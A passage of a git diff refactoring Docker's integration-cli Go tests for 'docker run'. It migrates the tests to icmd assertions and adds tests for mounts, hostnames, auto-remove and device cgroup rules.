runCommandWithOutput(runCmd) - stateExitCode := findContainerExitCode(c, name) - if !(exit == expected && strings.Contains(stateExitCode, strconv.Itoa(expected))) { - c.Fatalf("Run cmd that cannot be invoked should have errored with code %d, but we got exit: %d, State.ExitCode: %s", expected, exit, stateExitCode) - } + icmd.RunCommand(dockerBinary, "run", "--name", name, "busybox", "/etc").Assert(c, icmd.Expected{ + ExitCode: expected, + Error: fmt.Sprintf("exit status %d", expected), + }) } // TestRunNonExistingImage checks that 'docker run foo' exits with error msg 125 and contains 'Unable to find image' +// FIXME(vdemeester) should be a unit test func (s *DockerSuite) TestRunNonExistingImage(c *check.C) { - runCmd := exec.Command(dockerBinary, "run", "foo") - out, exit, err := runCommandWithOutput(runCmd) - if !(err != nil && exit == 125 && strings.Contains(out, "Unable to find image")) { - c.Fatalf("Run non-existing image should have errored with 'Unable to find image' code 125, but we got out: %s, exit: %d, err: %s", out, exit, err) - } + icmd.RunCommand(dockerBinary, "run", "foo").Assert(c, icmd.Expected{ + ExitCode: 125, + Err: "Unable to find image", + }) } // TestDockerFails checks that 'docker run -foo busybox' exits with 125 to signal docker run failed +// FIXME(vdemeester) should be a unit test func (s *DockerSuite) TestDockerFails(c *check.C) { - runCmd := exec.Command(dockerBinary, "run", "-foo", "busybox") - out, exit, err := runCommandWithOutput(runCmd) - if !(err != nil && exit == 125) { - c.Fatalf("Docker run with flag not defined should exit with 125, but we got out: %s, exit: %d, err: %s", out, exit, err) - } + icmd.RunCommand(dockerBinary, "run", "-foo", "busybox").Assert(c, icmd.Expected{ + ExitCode: 125, + Error: "exit status 125", + }) } // TestRunInvalidReference invokes docker run with a bad reference. @@ -4091,8 +3716,8 @@ func (s *DockerSuite) TestRunInvalidReference(c *check.C) { c.Fatalf("expected non-zero exist code; received %d", exit) } - if !strings.Contains(out, "Error parsing reference") { - c.Fatalf(`Expected "Error parsing reference" in output; got: %s`, out) + if !strings.Contains(out, "invalid reference format") { + c.Fatalf(`Expected "invalid reference format" in output; got: %s`, out) } } @@ -4101,15 +3726,10 @@ func (s *DockerSuite) TestRunInitLayerPathOwnership(c *check.C) { // Not applicable on Windows as it does not support Linux uid/gid ownership testRequires(c, DaemonIsLinux) name := "testetcfileownership" - _, err := buildImage(name, - `FROM busybox + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd RUN echo 'dockerio:x:1001:' >> /etc/group - RUN chown dockerio:dockerio /etc`, - true) - if err != nil { - c.Fatal(err) - } + RUN chown dockerio:dockerio /etc`)) // Test that dockerio ownership of /etc is retained at runtime out, _ := dockerCmd(c, "run", "--rm", name, "stat", "-c", "%U:%G", "/etc") @@ -4165,15 +3785,8 @@ func (s *DockerSuite) TestRunVolumesMountedAsShared(c *check.C) { // Convert this directory into a shared mount point so that we do // not rely on propagation properties of parent mount. - cmd := exec.Command("mount", "--bind", tmpDir, tmpDir) - if _, err = runCommand(cmd); err != nil { - c.Fatal(err) - } - - cmd = exec.Command("mount", "--make-private", "--make-shared", tmpDir) - if _, err = runCommand(cmd); err != nil { - c.Fatal(err) - } + icmd.RunCommand("mount", "--bind", tmpDir, tmpDir).Assert(c, icmd.Success) + icmd.RunCommand("mount", "--make-private", "--make-shared", tmpDir).Assert(c, icmd.Success) dockerCmd(c, "run", "--privileged", "-v", fmt.Sprintf("%s:/volume-dest:shared", tmpDir), "busybox", "mount", "--bind", "/volume-dest/mnt1", "/volume-dest/mnt1") @@ -4215,25 +3828,15 @@ func (s *DockerSuite) TestRunVolumesMountedAsSlave(c *check.C) { // Convert this directory into a shared mount point so that we do // not rely on propagation properties of parent mount. - cmd := exec.Command("mount", "--bind", tmpDir, tmpDir) - if _, err = runCommand(cmd); err != nil { - c.Fatal(err) - } - - cmd = exec.Command("mount", "--make-private", "--make-shared", tmpDir) - if _, err = runCommand(cmd); err != nil { - c.Fatal(err) - } + icmd.RunCommand("mount", "--bind", tmpDir, tmpDir).Assert(c, icmd.Success) + icmd.RunCommand("mount", "--make-private", "--make-shared", tmpDir).Assert(c, icmd.Success) dockerCmd(c, "run", "-i", "-d", "--name", "parent", "-v", fmt.Sprintf("%s:/volume-dest:slave", tmpDir), "busybox", "top") // Bind mount tmpDir2/ onto tmpDir/mnt1. If mount propagates inside // container then contents of tmpDir2/slave-testfile should become // visible at "/volume-dest/mnt1/slave-testfile" - cmd = exec.Command("mount", "--bind", tmpDir2, path.Join(tmpDir, "mnt1")) - if _, err = runCommand(cmd); err != nil { - c.Fatal(err) - } + icmd.RunCommand("mount", "--bind", tmpDir2, path.Join(tmpDir, "mnt1")).Assert(c, icmd.Success) out, _ := dockerCmd(c, "exec", "parent", "cat", "/volume-dest/mnt1/slave-testfile") @@ -4255,11 +3858,10 @@ func (s *DockerSuite) TestRunNamedVolumeCopyImageData(c *check.C) { testRequires(c, DaemonIsLinux) testImg := "testvolumecopy" - _, err := buildImage(testImg, ` + buildImageSuccessfully(c, testImg, build.WithDockerfile(` FROM busybox RUN mkdir -p /foo && echo hello > /foo/hello - `, true) - c.Assert(err, check.IsNil) + `)) dockerCmd(c, "run", "-v", "foo:/foo", testImg) out, _ := dockerCmd(c, "run", "-v", "foo:/foo", "busybox", "cat", "/foo/hello") @@ -4274,32 +3876,61 @@ func (s *DockerSuite) TestRunNamedVolumeNotRemoved(c *check.C) { dockerCmd(c, "run", "--rm", "-v", "test:"+prefix+"/foo", "-v", prefix+"/bar", "busybox", "true") dockerCmd(c, "volume", "inspect", "test") out, _ := dockerCmd(c, "volume", "ls", "-q") - c.Assert(strings.TrimSpace(out), checker.Equals, "test") + c.Assert(strings.TrimSpace(out), checker.Contains, "test") dockerCmd(c, "run", "--name=test", "-v", "test:"+prefix+"/foo", "-v", prefix+"/bar", "busybox", "true") dockerCmd(c, "rm", "-fv", "test") dockerCmd(c, "volume", "inspect", "test") out, _ = dockerCmd(c, "volume", "ls", "-q") - c.Assert(strings.TrimSpace(out), checker.Equals, "test") + c.Assert(strings.TrimSpace(out), checker.Contains, "test") } func (s *DockerSuite) TestRunNamedVolumesFromNotRemoved(c *check.C) { prefix, _ := getPrefixAndSlashFromDaemonPlatform() dockerCmd(c, "volume", "create", "test") - dockerCmd(c, "run", "--name=parent", "-v", "test:"+prefix+"/foo", "-v", prefix+"/bar", "busybox", "true") + cid, _ := dockerCmd(c, "run", "-d", "--name=parent", "-v", "test:"+prefix+"/foo", "-v", prefix+"/bar", "busybox", "true") dockerCmd(c, "run", "--name=child", "--volumes-from=parent", "busybox", "true") + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + container, err := cli.ContainerInspect(context.Background(), strings.TrimSpace(cid)) + c.Assert(err, checker.IsNil) + var vname string + for _, v := range container.Mounts { + if v.Name != "test" { + vname = v.Name + } + } + c.Assert(vname, checker.Not(checker.Equals), "") + // Remove the parent so there are not other references to the volumes dockerCmd(c, "rm", "-f", "parent") // now remove the child and ensure the named volume (and only the named volume) still exists dockerCmd(c, "rm", "-fv", "child") dockerCmd(c, "volume", "inspect", "test") out, _ := dockerCmd(c, "volume", "ls", "-q") - c.Assert(strings.TrimSpace(out), checker.Equals, "test") + c.Assert(strings.TrimSpace(out), checker.Contains, "test") + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), vname) } func (s *DockerSuite) TestRunAttachFailedNoLeak(c *check.C) { + // TODO @msabansal - https://github.com/moby/moby/issues/35023. Duplicate + // port mappings are not errored out on RS3 builds. Temporarily disabling + // this test pending further investigation. Note we parse kernel.GetKernelVersion + // rather than system.GetOSVersion as test binaries aren't manifested, so would + // otherwise report build 9200. + if runtime.GOOS == "windows" { + v, err := kernel.GetKernelVersion() + c.Assert(err, checker.IsNil) + build, _ := strconv.Atoi(strings.Split(strings.SplitN(v.String(), " ", 3)[2][1:], ".")[0]) + if build == 16299 { + c.Skip("Temporarily disabled on RS3 builds") + } + } + nroutines, err := getGoroutineNumber() c.Assert(err, checker.IsNil) @@ -4335,14 +3966,9 @@ func (s *DockerSuite) TestRunVolumeWithOneCharacter(c *check.C) { func (s *DockerSuite) TestRunVolumeCopyFlag(c *check.C) { testRequires(c, DaemonIsLinux) // Windows does not support copying data from image to the volume - _, err := buildImage("volumecopy", - `FROM busybox + buildImageSuccessfully(c, "volumecopy", build.WithDockerfile(`FROM busybox RUN mkdir /foo && echo hello > /foo/bar - CMD cat /foo/bar`, - true, - ) - c.Assert(err, checker.IsNil) - + CMD cat /foo/bar`)) dockerCmd(c, "volume", "create", "test") // test with the nocopy flag @@ -4378,26 +4004,30 @@ func (s *DockerSuite) TestRunDNSInHostMode(c *check.C) { expectedOutput := "nameserver 127.0.0.1" expectedWarning := "Localhost DNS setting" - out, stderr, _ := dockerCmdWithStdoutStderr(c, "run", "--dns=127.0.0.1", "--net=host", "busybox", "cat", "/etc/resolv.conf") - c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out)) - c.Assert(stderr, checker.Contains, expectedWarning, check.Commentf("Expected warning on stderr about localhost resolver, but got %q", stderr)) + cli.DockerCmd(c, "run", "--dns=127.0.0.1", "--net=host", "busybox", "cat", "/etc/resolv.conf").Assert(c, icmd.Expected{ + Out: expectedOutput, + Err: expectedWarning, + }) expectedOutput = "nameserver 1.2.3.4" - out, _ = dockerCmd(c, "run", "--dns=1.2.3.4", "--net=host", "busybox", "cat", "/etc/resolv.conf") - c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out)) + cli.DockerCmd(c, "run", "--dns=1.2.3.4", "--net=host", "busybox", "cat", "/etc/resolv.conf").Assert(c, icmd.Expected{ + Out: expectedOutput, + }) expectedOutput = "search example.com" - out, _ = dockerCmd(c, "run", "--dns-search=example.com", "--net=host", "busybox", "cat", "/etc/resolv.conf") - c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out)) + cli.DockerCmd(c, "run", "--dns-search=example.com", "--net=host", "busybox", "cat", "/etc/resolv.conf").Assert(c, icmd.Expected{ + Out: expectedOutput, + }) expectedOutput = "options timeout:3" - out, _ = dockerCmd(c, "run", "--dns-opt=timeout:3", "--net=host", "busybox", "cat", "/etc/resolv.conf") - c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out)) + cli.DockerCmd(c, "run", "--dns-opt=timeout:3", "--net=host", "busybox", "cat", "/etc/resolv.conf").Assert(c, icmd.Expected{ + Out: expectedOutput, + }) expectedOutput1 := "nameserver 1.2.3.4" expectedOutput2 := "search example.com" expectedOutput3 := "options timeout:3" - out, _ = dockerCmd(c, "run", "--dns=1.2.3.4", "--dns-search=example.com", "--dns-opt=timeout:3", "--net=host", "busybox", "cat", "/etc/resolv.conf") + out := cli.DockerCmd(c, "run", "--dns=1.2.3.4", "--dns-search=example.com", "--dns-opt=timeout:3", "--net=host", "busybox", "cat", "/etc/resolv.conf").Combined() c.Assert(out, checker.Contains, expectedOutput1, check.Commentf("Expected '%s', but got %q", expectedOutput1, out)) c.Assert(out, checker.Contains, expectedOutput2, check.Commentf("Expected '%s', but got %q", expectedOutput2, out)) c.Assert(out, checker.Contains, expectedOutput3, check.Commentf("Expected '%s', but got %q", expectedOutput3, out)) @@ -4421,6 +4051,29 @@ func (s *DockerSuite) TestRunRmAndWait(c *check.C) { c.Assert(code, checker.Equals, 0) } +// Test that auto-remove is performed by the daemon (API 1.25 and above) +func (s *DockerSuite) TestRunRm(c *check.C) { + name := "miss-me-when-im-gone" + cli.DockerCmd(c, "run", "--name="+name, "--rm", "busybox") + + cli.Docker(cli.Inspect(name), cli.Format(".name")).Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "No such object: " + name, + }) +} + +// Test that auto-remove is performed by the client on API versions that do not support daemon-side api-remove (API < 1.25) +func (s *DockerSuite) TestRunRmPre125Api(c *check.C) { + name := "miss-me-when-im-gone" + envs := appendBaseEnv(os.Getenv("DOCKER_TLS_VERIFY") != "", "DOCKER_API_VERSION=1.24") + cli.Docker(cli.Args("run", "--name="+name, "--rm", "busybox"), cli.WithEnvironmentVariables(envs...)).Assert(c, icmd.Success) + + cli.Docker(cli.Inspect(name), cli.Format(".name")).Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "No such object: " + name, + }) +} + // Test case for #23498 func (s *DockerSuite) TestRunUnsetEntrypoint(c *check.C) { testRequires(c, DaemonIsLinux) @@ -4431,33 +4084,34 @@ RUN chmod 755 /entrypoint.sh ENTRYPOINT ["/entrypoint.sh"] CMD echo foobar` - ctx, err := fakeContext(dockerfile, map[string]string{ - "entrypoint.sh": `#!/bin/sh + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(dockerfile), + fakecontext.WithFiles(map[string]string{ + "entrypoint.sh": `#!/bin/sh echo "I am an entrypoint" exec "$@"`, - }) - c.Assert(err, check.IsNil) + })) defer ctx.Close() - _, err = buildImageFromContext(name, ctx, true) - c.Assert(err, check.IsNil) + cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx)) - out, _ := dockerCmd(c, "run", "--entrypoint=", "-t", name, "echo", "foo") + out := cli.DockerCmd(c, "run", "--entrypoint=", "-t", name, "echo", "foo").Combined() c.Assert(strings.TrimSpace(out), check.Equals, "foo") // CMD will be reset as well (the same as setting a custom entrypoint) - _, _, err = dockerCmdWithError("run", "--entrypoint=", "-t", name) - c.Assert(err, check.NotNil) - c.Assert(err.Error(), checker.Contains, "No command specified") + cli.Docker(cli.Args("run", "--entrypoint=", "-t", name)).Assert(c, icmd.Expected{ + ExitCode: 125, + Err: "No command specified", + }) } func (s *DockerDaemonSuite) TestRunWithUlimitAndDaemonDefault(c *check.C) { - c.Assert(s.d.StartWithBusybox("--debug", "--default-ulimit=nofile=65535"), checker.IsNil) + s.d.StartWithBusybox(c, "--debug", "--default-ulimit=nofile=65535") name := "test-A" _, err := s.d.Cmd("run", "--name", name, "-d", "busybox", "top") c.Assert(err, checker.IsNil) - c.Assert(s.d.waitRun(name), check.IsNil) + c.Assert(s.d.WaitRun(name), check.IsNil) out, err := s.d.Cmd("inspect", "--format", "{{.HostConfig.Ulimits}}", name) c.Assert(err, checker.IsNil) @@ -4466,7 +4120,7 @@ func (s *DockerDaemonSuite) TestRunWithUlimitAndDaemonDefault(c *check.C) { name = "test-B" _, err = s.d.Cmd("run", "--name", name, "--ulimit=nofile=42", "-d", "busybox", "top") c.Assert(err, checker.IsNil) - c.Assert(s.d.waitRun(name), check.IsNil) + c.Assert(s.d.WaitRun(name), check.IsNil) out, err = s.d.Cmd("inspect", "--format", "{{.HostConfig.Ulimits}}", name) c.Assert(err, checker.IsNil) @@ -4479,7 +4133,7 @@ func (s *DockerSuite) TestRunStoppedLoggingDriverNoLeak(c *check.C) { out, _, err := dockerCmdWithError("run", "--name=fail", "--log-driver=splunk", "busybox", "true") c.Assert(err, checker.NotNil) - c.Assert(out, checker.Contains, "Failed to initialize logging driver", check.Commentf("error should be about logging driver, got output %s", out)) + c.Assert(out, checker.Contains, "failed to initialize logging driver", check.Commentf("error should be about logging driver, got output %s", out)) // NGoroutines is not updated right away, so we need to wait before failing c.Assert(waitForGoroutines(nroutines), checker.IsNil) @@ -4510,29 +4164,10 @@ func (s *DockerSuite) TestRunCredentialSpecFailures(c *check.C) { func (s *DockerSuite) TestRunCredentialSpecWellFormed(c *check.C) { testRequires(c, DaemonIsWindows, SameHostDaemon) validCS := readFile(`fixtures\credentialspecs\valid.json`, c) - writeFile(filepath.Join(dockerBasePath, `credentialspecs\valid.json`), validCS, c) + writeFile(filepath.Join(testEnv.DaemonInfo.DockerRootDir, `credentialspecs\valid.json`), validCS, c) dockerCmd(c, "run", `--security-opt=credentialspec=file://valid.json`, "busybox", "true") } -// Windows specific test to ensure that a servicing app container is started -// if necessary once a container exits. It does this by forcing a no-op -// servicing event and verifying the event from Hyper-V-Compute -func (s *DockerSuite) TestRunServicingContainer(c *check.C) { - testRequires(c, DaemonIsWindows, SameHostDaemon) - - out, _ := dockerCmd(c, "run", "-d", WindowsBaseImage, "cmd", "/c", "mkdir c:\\programdata\\Microsoft\\Windows\\ContainerUpdates\\000_000_d99f45d0-ffc8-4af7-bd9c-ea6a62e035c9_200 && sc control cexecsvc 255") - containerID := strings.TrimSpace(out) - err := waitExited(containerID, 60*time.Second) - c.Assert(err, checker.IsNil) - - cmd := exec.Command("powershell", "echo", `(Get-WinEvent -ProviderName "Microsoft-Windows-Hyper-V-Compute" -FilterXPath 'Event[System[EventID=2010]]' -MaxEvents 1).Message`) - out2, _, err := runCommandWithOutput(cmd) - c.Assert(err, checker.IsNil) - c.Assert(out2, checker.Contains, `"Servicing":true`, check.Commentf("Servicing container does not appear to have been started: %s", out2)) - c.Assert(out2, checker.Contains, `Windows Container (Servicing)`, check.Commentf("Didn't find 'Windows Container (Servicing): %s", out2)) - c.Assert(out2, checker.Contains, containerID+"_servicing", check.Commentf("Didn't find '%s_servicing': %s", containerID+"_servicing", out2)) -} - func (s *DockerSuite) TestRunDuplicateMount(c *check.C) { testRequires(c, SameHostDaemon, DaemonIsLinux, NotUserNamespace) @@ -4642,16 +4277,18 @@ func (s *DockerSuite) TestSlowStdinClosing(c *check.C) { name := "testslowstdinclosing" repeat := 3 // regression happened 50% of the time for i := 0; i < repeat; i++ { - cmd := exec.Command(dockerBinary, "run", "--rm", "--name", name, "-i", "busybox", "cat") - cmd.Stdin = &delayedReader{} + cmd := icmd.Cmd{ + Command: []string{dockerBinary, "run", "--rm", "--name", name, "-i", "busybox", "cat"}, + Stdin: &delayedReader{}, + } done := make(chan error, 1) go func() { - _, err := runCommand(cmd) + err := icmd.RunCmd(cmd).Error done <- err }() select { - case <-time.After(15 * time.Second): + case <-time.After(30 * time.Second): c.Fatal("running container timed out") // cleanup in teardown case err := <-done: c.Assert(err, checker.IsNil) @@ -4668,7 +4305,7 @@ func (s *delayedReader) Read([]byte) (int, error) { // #28823 (originally #28639) func (s *DockerSuite) TestRunMountReadOnlyDevShm(c *check.C) { - testRequires(c, SameHostDaemon, DaemonIsLinux) + testRequires(c, SameHostDaemon, DaemonIsLinux, NotUserNamespace) emptyDir, err := ioutil.TempDir("", "test-read-only-dev-shm") c.Assert(err, check.IsNil) defer os.RemoveAll(emptyDir) @@ -4679,11 +4316,224 @@ func (s *DockerSuite) TestRunMountReadOnlyDevShm(c *check.C) { c.Assert(out, checker.Contains, "Read-only file system") } +func (s *DockerSuite) TestRunMount(c *check.C) { + testRequires(c, DaemonIsLinux, SameHostDaemon, NotUserNamespace) + + // mnt1, mnt2, and testCatFooBar are commonly used in multiple test cases + tmpDir, err := ioutil.TempDir("", "mount") + if err != nil { + c.Fatal(err) + } + defer os.RemoveAll(tmpDir) + mnt1, mnt2 := path.Join(tmpDir, "mnt1"), path.Join(tmpDir, "mnt2") + if err := os.Mkdir(mnt1, 0755); err != nil { + c.Fatal(err) + } + if err := os.Mkdir(mnt2, 0755); err != nil { + c.Fatal(err) + } + if err := ioutil.WriteFile(path.Join(mnt1, "test1"), []byte("test1"), 0644); err != nil { + c.Fatal(err) + } + if err := ioutil.WriteFile(path.Join(mnt2, "test2"), []byte("test2"), 0644); err != nil { + c.Fatal(err) + } + testCatFooBar := func(cName string) error { + out, _ := dockerCmd(c, "exec", cName, "cat", "/foo/test1") + if out != "test1" { + return fmt.Errorf("%s not mounted on /foo", mnt1) + } + out, _ = dockerCmd(c, "exec", cName, "cat", "/bar/test2") + if out != "test2" { + return fmt.Errorf("%s not mounted on /bar", mnt2) + } + return nil + } + + type testCase struct { + equivalents [][]string + valid bool + // fn should be nil if valid==false + fn func(cName string) error + } + cases := []testCase{ + { + equivalents: [][]string{ + { + "--mount", fmt.Sprintf("type=bind,src=%s,dst=/foo", mnt1), + "--mount", fmt.Sprintf("type=bind,src=%s,dst=/bar", mnt2), + }, + { + "--mount", fmt.Sprintf("type=bind,src=%s,dst=/foo", mnt1), + "--mount", fmt.Sprintf("type=bind,src=%s,target=/bar", mnt2), + }, + { + "--volume", mnt1 + ":/foo", + "--mount", fmt.Sprintf("type=bind,src=%s,target=/bar", mnt2), + }, + }, + valid: true, + fn: testCatFooBar, + }, + { + equivalents: [][]string{ + { + "--mount", fmt.Sprintf("type=volume,src=%s,dst=/foo", mnt1), + "--mount", fmt.Sprintf("type=volume,src=%s,dst=/bar", mnt2), + }, + { + "--mount", fmt.Sprintf("type=volume,src=%s,dst=/foo", mnt1), + "--mount", fmt.Sprintf("type=volume,src=%s,target=/bar", mnt2), + }, + }, + valid: false, + }, + { + equivalents: [][]string{ + { + "--mount", fmt.Sprintf("type=bind,src=%s,dst=/foo", mnt1), + "--mount", fmt.Sprintf("type=volume,src=%s,dst=/bar", mnt2), + }, + { + "--volume", mnt1 + ":/foo", + "--mount", fmt.Sprintf("type=volume,src=%s,target=/bar", mnt2), + }, + }, + valid: false, + fn: testCatFooBar, + }, + { + equivalents: [][]string{ + { + "--read-only", + "--mount", "type=volume,dst=/bar", + }, + }, + valid: true, + fn: func(cName string) error { + _, _, err := dockerCmdWithError("exec", cName, "touch", "/bar/icanwritehere") + return err + }, + }, + { + equivalents: [][]string{ + { + "--read-only", + "--mount", fmt.Sprintf("type=bind,src=%s,dst=/foo", mnt1), + "--mount", "type=volume,dst=/bar", + }, + { + "--read-only", + "--volume", fmt.Sprintf("%s:/foo", mnt1), + "--mount", "type=volume,dst=/bar", + }, + }, + valid: true, + fn: func(cName string) error { + out, _ := dockerCmd(c, "exec", cName, "cat", "/foo/test1") + if out != "test1" { + return fmt.Errorf("%s not mounted on /foo", mnt1) + } + _, _, err := dockerCmdWithError("exec", cName, "touch", "/bar/icanwritehere") + return err + }, + }, + { + equivalents: [][]string{ + { + "--mount", fmt.Sprintf("type=bind,src=%s,dst=/foo", mnt1), + "--mount", fmt.Sprintf("type=bind,src=%s,dst=/foo", mnt2), + }, + { + "--mount", fmt.Sprintf("type=bind,src=%s,dst=/foo", mnt1), + "--mount", fmt.Sprintf("type=bind,src=%s,target=/foo", mnt2), + }, + { + "--volume", fmt.Sprintf("%s:/foo", mnt1), + "--mount", fmt.Sprintf("type=bind,src=%s,target=/foo", mnt2), + }, + }, + valid: false, + }, + { + equivalents: [][]string{ + { + "--volume", fmt.Sprintf("%s:/foo", mnt1), + "--mount", fmt.Sprintf("type=volume,src=%s,target=/foo", mnt2), + }, + }, + valid: false, + }, + { + equivalents: [][]string{ + { + "--mount", "type=volume,target=/foo", + "--mount", "type=volume,target=/foo", + }, + }, + valid: false, + }, + } + + for i, testCase := range cases { + for j, opts := range testCase.equivalents { + cName := fmt.Sprintf("mount-%d-%d", i, j) + _, _, err := dockerCmdWithError(append([]string{"run", "-i", "-d", "--name", cName}, + append(opts, []string{"busybox", "top"}...)...)...) + if testCase.valid { + c.Assert(err, check.IsNil, + check.Commentf("got error while creating a container with %v (%s)", opts, cName)) + c.Assert(testCase.fn(cName), check.IsNil, + check.Commentf("got error while executing test for %v (%s)", opts, cName)) + dockerCmd(c, "rm", "-f", cName) + } else { + c.Assert(err, checker.NotNil, + check.Commentf("got nil while creating a container with %v (%s)", opts, cName)) + } + } + } +} + +// Test that passing a FQDN as hostname properly sets hostname, and +// /etc/hostname. Test case for 29100 +func (s *DockerSuite) TestRunHostnameFQDN(c *check.C) { + testRequires(c, DaemonIsLinux) + + expectedOutput := "foobar.example.com\nfoobar.example.com\nfoobar\nexample.com\nfoobar.example.com" + out, _ := dockerCmd(c, "run", "--hostname=foobar.example.com", "busybox", "sh", "-c", `cat /etc/hostname && hostname && hostname -s && hostname -d && hostname -f`) + c.Assert(strings.TrimSpace(out), checker.Equals, expectedOutput) + + out, _ = dockerCmd(c, "run", "--hostname=foobar.example.com", "busybox", "sh", "-c", `cat /etc/hosts`) + expectedOutput = "foobar.example.com foobar" + c.Assert(strings.TrimSpace(out), checker.Contains, expectedOutput) +} + // Test case for 29129 func (s *DockerSuite) TestRunHostnameInHostMode(c *check.C) { - testRequires(c, DaemonIsLinux) + testRequires(c, DaemonIsLinux, NotUserNamespace) expectedOutput := "foobar\nfoobar" out, _ := dockerCmd(c, "run", "--net=host", "--hostname=foobar", "busybox", "sh", "-c", `echo $HOSTNAME && hostname`) c.Assert(strings.TrimSpace(out), checker.Equals, expectedOutput) } + +func (s *DockerSuite) TestRunAddDeviceCgroupRule(c *check.C) { + testRequires(c, DaemonIsLinux) + + deviceRule := "c 7:128 rwm" + + out, _ := dockerCmd(c, "run", "--rm", "busybox", "cat", "/sys/fs/cgroup/devices/devices.list") + if strings.Contains(out, deviceRule) { + c.Fatalf("%s shouldn't been in the device.list", deviceRule) + } + + out, _ = dockerCmd(c, "run", "--rm", fmt.Sprintf("--device-cgroup-rule=%s", deviceRule), "busybox", "grep", deviceRule, "/sys/fs/cgroup/devices/devices.list") + c.Assert(strings.TrimSpace(out), checker.Equals, deviceRule) +} + +// Verifies that running as local system is operating correctly on Windows +func (s *DockerSuite) TestWindowsRunAsSystem(c *check.C) { + testRequires(c, DaemonIsWindowsAtLeastBuild(15000)) + out, _ := dockerCmd(c, "run", "--net=none", `--user=nt authority\system`, "--hostname=XYZZY", minimalBaseImage(), "cmd", "/c", `@echo %USERNAME%`) + c.Assert(strings.TrimSpace(out), checker.Equals, "XYZZY$") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_run_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_run_unix_test.go index e346c19f8e..3444d22bfd 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_run_unix_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_run_unix_test.go @@ -4,6 +4,7 @@ package main import ( "bufio" + "context" "encoding/json" "fmt" "io/ioutil" @@ -16,13 +17,17 @@ import ( "syscall" "time" + "github.com/docker/docker/client" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli" + "github.com/docker/docker/integration-cli/cli/build" "github.com/docker/docker/pkg/homedir" - "github.com/docker/docker/pkg/integration/checker" "github.com/docker/docker/pkg/mount" "github.com/docker/docker/pkg/parsers" "github.com/docker/docker/pkg/sysinfo" "github.com/go-check/check" "github.com/kr/pty" + "gotest.tools/icmd" ) // #6509 @@ -71,9 +76,7 @@ func (s *DockerSuite) TestRunWithVolumesIsRecursive(c *check.C) { c.Assert(err, checker.IsNil) defer f.Close() - runCmd := exec.Command(dockerBinary, "run", "--name", "test-data", "--volume", fmt.Sprintf("%s:/tmp:ro", tmpDir), "busybox:latest", "ls", "/tmp/tmpfs") - out, _, _, err := runCommandWithStdoutStderr(runCmd) - c.Assert(err, checker.IsNil) + out, _ := dockerCmd(c, "run", "--name", "test-data", "--volume", fmt.Sprintf("%s:/tmp:ro", tmpDir), "busybox:latest", "ls", "/tmp/tmpfs") c.Assert(out, checker.Contains, filepath.Base(f.Name()), check.Commentf("Recursive bind mount test failed. Expected file not found")) } @@ -90,7 +93,7 @@ func (s *DockerSuite) TestRunDeviceDirectory(c *check.C) { c.Assert(strings.Trim(out, "\r\n"), checker.Contains, "seq", check.Commentf("expected output /dev/othersnd/seq")) } -// TestRunDetach checks attaching and detaching with the default escape sequence. +// TestRunAttachDetach checks attaching and detaching with the default escape sequence. func (s *DockerSuite) TestRunAttachDetach(c *check.C) { name := "attach-detach" @@ -141,7 +144,7 @@ func (s *DockerSuite) TestRunAttachDetach(c *check.C) { c.Assert(out, checker.Contains, "detach") } -// TestRunDetach checks attaching and detaching with the escape sequence specified via flags. +// TestRunAttachDetachFromFlag checks attaching and detaching with the escape sequence specified via flags. func (s *DockerSuite) TestRunAttachDetachFromFlag(c *check.C) { name := "attach-detach" keyCtrlA := []byte{1} @@ -202,7 +205,7 @@ func (s *DockerSuite) TestRunAttachDetachFromFlag(c *check.C) { c.Assert(running, checker.Equals, "true", check.Commentf("expected container to still be running")) } -// TestRunDetach checks attaching and detaching with the escape sequence specified via flags. +// TestRunAttachDetachFromInvalidFlag checks attaching and detaching with the escape sequence specified via flags. func (s *DockerSuite) TestRunAttachDetachFromInvalidFlag(c *check.C) { name := "attach-detach" dockerCmd(c, "run", "--name", name, "-itd", "busybox", "top") @@ -223,6 +226,7 @@ func (s *DockerSuite) TestRunAttachDetachFromInvalidFlag(c *check.C) { if err := cmd.Start(); err != nil { c.Fatal(err) } + go cmd.Wait() bufReader := bufio.NewReader(stdout) out, err := bufReader.ReadString('\n') @@ -230,11 +234,11 @@ func (s *DockerSuite) TestRunAttachDetachFromInvalidFlag(c *check.C) { c.Fatal(err) } // it should print a warning to indicate the detach key flag is invalid - errStr := "Invalid escape keys (ctrl-A,a) provided" + errStr := "Invalid detach keys (ctrl-A,a) provided" c.Assert(strings.TrimSpace(out), checker.Equals, errStr) } -// TestRunDetach checks attaching and detaching with the escape sequence specified via config file. +// TestRunAttachDetachFromConfig checks attaching and detaching with the escape sequence specified via config file. func (s *DockerSuite) TestRunAttachDetachFromConfig(c *check.C) { keyCtrlA := []byte{1} keyA := []byte{97} @@ -317,7 +321,7 @@ func (s *DockerSuite) TestRunAttachDetachFromConfig(c *check.C) { c.Assert(running, checker.Equals, "true", check.Commentf("expected container to still be running")) } -// TestRunDetach checks attaching and detaching with the detach flags, making sure it overrides config file +// TestRunAttachDetachKeysOverrideConfig checks attaching and detaching with the detach flags, making sure it overrides config file func (s *DockerSuite) TestRunAttachDetachKeysOverrideConfig(c *check.C) { keyCtrlA := []byte{1} keyA := []byte{97} @@ -421,6 +425,7 @@ func (s *DockerSuite) TestRunAttachInvalidDetachKeySequencePreserved(c *check.C) if err := cmd.Start(); err != nil { c.Fatal(err) } + go cmd.Wait() c.Assert(waitRun(name), check.IsNil) // Invalid escape sequence aba, should print aba in output @@ -495,11 